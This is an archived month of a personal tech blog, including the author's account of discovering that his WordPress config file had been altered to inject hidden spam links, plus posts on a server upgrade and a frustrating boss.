Monthly Archive for August, 2007

Well That Was Embarassing

Published
by
Chris Meller
on August 15, 2007
in Announcements, Internet and Wordpress
. Comments

It appears my blog was hacked along abouts July 29th, but I just now noticed.

The attacker managed to edit my wp-config.php file and attach WP-specific code that would include their remote file in the footer of each page load. I honestly probably never would have noticed, had I not checked my config file to see if the default WordPress cache were enabled or not.

Not only do I not load my own blog page frequently enough, but I don’t examine it closely enough either. The included code added a vast number of mortgage and debt consolidation spam links to the footer, all wrapped nicely in a hidden <div>. Since the code was valid and the destination server wasn’t slow enough to drag down the page, I shudder to think how long I could have been un-knowingly contributing to these spammers had I not randomly checked a file that’s generally set and forgotten.

If you’d like to check out the specific code that was appended to my wp-config.php file, I’ve dumped it on Pasteosaurus for future reference. In addition, the code inserted at the end of every page is here. As you can see, not only were they spamming for mortgages and debt consolidation, but they were referencing legitimate URLs for universities (Auburn and Vanderbilt). Why anyone would want to discredit an EDU in search results, I have no clue…

As for me, I’ll be keeping a better eye on my blog updates. I’ve switched to SVN so that it’s even easier than before, just to make sure there are no possible excuses next time a security release is made. I’ve also migrated this blog back to my Media Temple (gs) account temporarily, until I can finally fix some fallout from a botched Fedora Core 4 upgrade on my dedicated box1. If everything seems to be dragging, blame (mt)…

Finally, I’ve re-evaluated some of the plugins I’d been using. A lot of them I’d simply kept around for backwards compatibility, not wanting to break previous entries. This was a bad idea, since I was no longer paying attention to possible XSS vulnerabilities or stability patches for these plugins, leaving another potential opening for abuse on my blog. From now on, it’s the straight and narrow for me!

Not exactly how I wanted to spend my evening, but it could have been a lot worse… With un-restricted access to my blog and all it’s data, this is really the best possible outcome2.

  1. I really wish Plesk would supply a yum repo… [back]
  2. Yes, I do run regular backups of the database, so data loss would have been at a very minimum. It still would have been very painful. [back]

OS Upgrades Coming down the Tubes

Published
by
Chris Meller
on August 7, 2007
in Announcements and Techno-Babble
. Comments

Just a little warning that tomorrow my blog will likely be intermittently unavailable while I’m performing a couple of OS upgrades which will require at least two reboots (that I know of).

I hate rebooting a live server, it always saddens me to see a quality uptime disappear just like that

22:32:39 up 97 days, 14 min, 3 users, load average: 0.03, 0.06, 0.01

No, There’s Nothing New to See Yet!

Published
by
Chris Meller
on August 7, 2007
in Daily Grind, Rants and Work
. Comments

So much of what we call management consists in making it difficult for people to work.
- Peter Drucker

Boy, isn’t it the truth? My boss is “managing” me right into a hole of utter un-productivity right now.

He apparently doesn’t understand that only 10% of the project is actually the layout of the interface (ie: stuff he can “see”). The other 90% is where you’re working in the background making sure that pretty interface actually does something.

Two to three times a day, he’ll come by, call me, or email me asking if there’s anything new for him to see1.

No, there’s nothing new for you to see, I’ll tell you when I’m done with something so you can see it. The more time we spend talking about how there’s nothing for you to see, the less time I get to spend actually working on something for you to see.

Add to it that it reinforces a bitter feeling that I’m not getting anything done nearly fast enough even though I’m working my ass off, and you’ve got one thoroughly unhappy developer.

Time to call those two job recruiters back, me thinks…

  1. He’s supposedly on vacation this week, but at 8:24 this morning he still found the time to email me asking if there’s anything else he can see. [back]